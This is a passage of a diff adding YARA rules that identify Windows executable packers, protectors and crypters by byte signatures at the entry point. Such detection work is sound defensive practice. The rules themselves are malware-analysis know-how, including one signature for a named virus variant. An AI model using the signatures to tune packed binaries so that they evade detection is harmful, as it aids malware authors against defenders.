+		$a0 = { 60 E8 07 00 00 00 61 68 ?? ?? 40 00 C3 83 04 24 18 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4UnextractablePasswordchecking
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 80 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphi20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Reg2Exe225byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 68 00 00 00 68 00 00 00 00 68 70 7D 40 00 E8 AE 20 00 00 83 C4 0C 68 00 00 00 00 E8 AF 52 00 00 A3 74 7D 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 9C 52 00 00 A3 70 7D 40 00 E8 24 50 00 00 E8 E2 48 00 00 E8 44 34 00 00 E8 54 28 00 00 E8 98 27 00 00 E8 93 20 00 00 68 01 00 00 00 68 D0 7D 40 00 68 00 00 00 00 8B 15 D0 7D 40 00 E8 89 8F 00 00 B8 00 00 10 00 68 01 00 00 00 E8 9A 8F 00 00 FF 35 A4 7F 40 00 68 00 01 00 00 E8 3A 23 00 00 8D 0D A8 7D 40 00 5A E8 5E 1F 00 00 FF 35 A8 7D 40 00 68 00 01 00 00 E8 2A 52 00 00 A3 B4 7D 40 00 FF 35 A4 7F 40 00 FF 35 B4 7D 40 00 FF 35 A8 7D 40 00 E8 5C 0C 00 00 8D 0D A0 7D 40 00 5A E8 26 1F 00 00 FF 35 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov420SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 F8 8E 4C 00 68 F0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 84 A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 80 A5 4C 00 C1 E1 08 03 CA 89 0D 7C A5 4C 00 C1 E8 10 A3 78 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DalKrypt10byDalKiT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 58 68 ?? ?? ?? 00 5F 33 DB EB 0D 8A 14 03 80 EA 07 80 F2 04 88 14 03 43 81 FB ?? ?? ?? 00 72 EB FF E7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv15Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239compressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 51 68 ?? ?? ?? ?? 59 81 F1 12 3C CB 98 E9 53 2C 00 00 F7 D7 E9 EB 60 00 00 83 45 F8 02 E9 E3 36 00 00 F6 45 F8 20 0F 84 1E 21 00 00 55 E9 80 62 00 00 87 0C 24 8B E9 ?? ?? ?? ?? 00 00 23 C1 81 E9 ?? ?? ?? ?? 57 E9 ED 00 00 00 0F 88 ?? ?? ?? ?? E9 2C 0D 00 00 81 ED BB 43 CB 79 C1 E0 1C E9 9E 14 00 00 0B 15 ?? ?? ?? ?? 81 E2 2A 70 7F 49 81 C2 9D 83 12 3B E8 0C 50 00 00 E9 A0 16 00 00 59 5B C3 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 41 42 00 00 E9 93 33 00 00 31 DB 89 D8 59 5B C3 A1 ?? ?? ?? ?? 8A 00 2C 99 E9 82 30 00 00 0F 8A ?? ?? ?? ?? B8 01 00 00 00 31 D2 0F A2 25 FF 0F 00 00 E9 72 21 00 00 0F 86 57 0B 00 00 E9 ?? ?? ?? ?? C1 C0 03 E8 F0 36 00 00 E9 41 0A 00 00 81 F7 B3 6E 85 EA 81 C7 ?? ?? ?? ?? 87 3C 24 E9 74 52 00 00 0F 8E ?? ?? ?? ?? E8 5E 37 00 00 68 B1 74 96 13 5A E9 A1 04 00 00 81 D1 49 C0 12 27 E9 50 4E 00 00 C1 C8 1B 1B C3 81 E1 96 36 E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GameGuardv20065xxexesignbyhot_UNP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtectorv112LITE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv01emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 }
+	$a1 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Apex_cbeta500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector11A12vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F 32 30 30 35 5F 33 5F 31 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule codeCrypter031
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 58 53 5B 90 BB ?? ?? 40 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC }
+
+condition:
+		$a0
+}
+	
+	
+rule PKTINYv10withTINYPROGv38
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePESHiELD2xFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEditionV11Xap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 10 }
+
+condition:
+		$a0
+}
+	
+	
+rule Excalibur103forgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118DllaPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 5C 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC50MFCAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah101byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F1 26 40 00 8B BD 18 28 40 00 8B 8D 20 28 40 00 B8 38 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 1C 28 40 00 31 C0 51 31 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 1C 28 40 00 8B 85 24 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 38 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 14 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov25xv26x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv11Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Escargot01byueMeat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 08 28 65 73 63 30 2E 31 29 60 68 2B ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 5C ?? ?? ?? 8B 00 FF D0 50 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50 B8 54 ?? ?? ?? 8B 00 FF D0 5F 80 3F 00 74 06 C6 07 00 47 EB F5 33 FF 8B 16 0B D2 75 03 8B 56 10 03 D3 03 D7 8B 0A C7 02 00 00 00 00 0B C9 74 4B F7 C1 00 00 00 80 74 14 81 E1 FF FF 00 00 50 51 50 B8 50 }
+
+condition:
+		$a0
+}
+	
+	
+rule EncryptPE2200461622006630WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 7A 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv060
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01BorlandDelphi30Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ActiveMARKTMR5311140Trymedia
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 79 11 7F AB 9A 4A 83 B5 C9 6B 1A 48 F9 27 B4 25 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev244
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 83 BD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv120v1201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 9A 70 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv104bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MESSv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA B9 ?? ?? F3 ?? ?? E3 ?? EB ?? EB ?? B6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv13v14Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50 }
+	$a1 = { 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule ThinstallV27XJitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressor120BetaPEPacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 EB ?? 45 78 50 72 2D 76 2E 31 2E 32 2E 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packanoid10ackanoid
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 00 ?? 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 ?? ?? ?? 00 8B 30 8B 78 04 BB ?? ?? ?? 00 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 5E EB DB B9 ?? ?? 00 00 BE 00 ?? ?? 00 EB 01 00 BF ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE1200331812003518WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv09781
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 49 87 40 ?? 87 DD 8B 85 CE 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv09782
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D1 84 40 ?? 87 DD 8B 85 56 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01Gleam100Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPackAltStubDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 C3 F6 00 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxModificationofHi924
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 53 51 52 1E 06 9C B8 21 35 CD 21 53 BB ?? ?? 26 ?? ?? 49 48 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor226DLLminimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 8B C6 87 04 24 68 ?? ?? ?? ?? 5E E9 ?? ?? ?? ?? 85 C8 E9 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 0F 81 ?? ?? ?? 00 81 FA ?? ?? ?? ?? 33 D0 E9 ?? ?? ?? 00 0F 8D ?? ?? ?? 00 81 D5 ?? ?? ?? ?? F7 D1 0B 15 ?? ?? ?? ?? C1 C2 ?? 81 C2 ?? ?? ?? ?? 9D E9 ?? ?? ?? ?? C1 E2 ?? C1 E8 ?? 81 EA ?? ?? ?? ?? 13 DA 81 E9 ?? ?? ?? ?? 87 04 24 8B C8 E9 ?? ?? ?? ?? 55 8B EC 83 C4 F8 89 45 FC 8B 45 FC 89 45 F8 8B 45 08 E9 ?? ?? ?? ?? 8B 45 E0 C6 00 00 FF 45 E4 E9 ?? ?? ?? ?? FF 45 E4 E9 ?? ?? ?? 00 F7 D3 0F 81 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 34 24 5E 8B 45 F4 E8 ?? ?? ?? 00 8B 45 F4 8B E5 5D C3 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtector102AshkibizDanehlar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectv135riscosoftwareIncAnticrackSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 47 65 74 50 72 6F 63 }
+
+condition:
+		$a0
+}
+	
+	
+rule upx_0_80_to_1_24 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="UPX 0.80 to 1.24"
+
+	strings:
+		$str1={6A 60 68 60 02 4B 00 E8 8B 04 00 00 83 65 FC 00 8D 45 90 50 FF 15 8C F1 48 00 C7 45 FC FE FF FF FF BF 94 00 00 00 57}
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule upx_1_00_to_1_07 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="19/03/2013"
+		description="UPX 1.00 to 1.07"
+
+	strings:
+		$str1={60 BE 00 ?0 4? 00 8D BE 00 B0 F? FF ?7 8? [3] ?0 9? [0-9] 90 90 90 90 [0-2] 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0}
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule upx_3 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="UPX 3.X"
+
+	strings:
+		$str1={60 BE 00 [2] 00 8D BE 00 [2] FF [1-12] EB 1? 90 90 90 90 90 [1-3] 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01}
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule obsidium : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="21/01/2013"
+		last_edit="17/03/2013"
+		description="Obsidium"
+
+	strings:
+		$str1={EB 02 [2] E8 25 00 00 00 EB 04 [4] EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 [2] C3 EB 02 [2] EB 04} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule pecompact2 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="PECompact"
+
+	strings:
+		$str1={B8 [3] 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule aspack : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="ASPack"
+
+	strings:
+		$str1={60 E8 00 00 00 00 5D 81 ED 5D 3B 40 00 64 A1 30 00 00 00 0F B6 40 02 0A C0 74 04 33 C0 87 00 B9 ?? ?? 00 00 8D BD B7 3B 40 00 8B F7 AC} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule execryptor : Protector
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="EXECryptor"
